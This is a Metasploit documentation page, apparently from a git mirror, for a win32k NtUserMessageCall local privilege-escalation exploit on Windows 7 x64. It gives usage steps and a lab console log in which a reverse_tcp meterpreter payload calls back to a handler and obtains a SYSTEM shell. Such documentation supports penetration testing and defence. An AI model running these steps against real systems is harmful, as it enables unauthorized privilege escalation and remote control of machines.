adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
00d209425b2d57d08fdedfbac87dca3ea15428df
metasploit-gs/documentation/modules/exploit/windows/local/ntusermessagecall.md
T
Tim W 00d209425b add documentation
2020-10-15 10:58:08 -05:00

2.3 KiB
Raw Blame History

Vulnerable Application

This module exploits a memory corruption vulnerability in win32k which is reachable via a NtUserMessageCall() system call.

This module has been tested against Windows 7 x64 SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows.

Verification Steps

  1. Get a non-SYSTEM meterpreter session on Windows 7 x64
  2. use exploit/windows/local/ntusermessagecall
  3. set session <session>
  4. set payload windows/meterpreter/reverse_tcp
  5. set LHOST <LHOST>
  6. set LPORT 5555
  7. exploit
  8. Get a SYSTEM session

Scenarios

Windows 7 SP1 x64

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.6:49157 (192.168.56.6)

msf5 exploit(multi/handler) > use exploit/windows/local/ntusermessagecall
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set session 1
session => 1
msf5 exploit(windows/local/ntusermessagecall) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermessagecall) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermessagecall) > run

[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 1808 launched.
[*] Injecting exploit into 1808 ...
[*] Exploit injected. Injecting payload into 1808...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 192.168.56.6
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.6:49158) at 2020-07-10 17:10:54 +0800

meterpreter > sysinfo
Computer        : USER-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Reference in New Issue View Git Blame Copy Permalink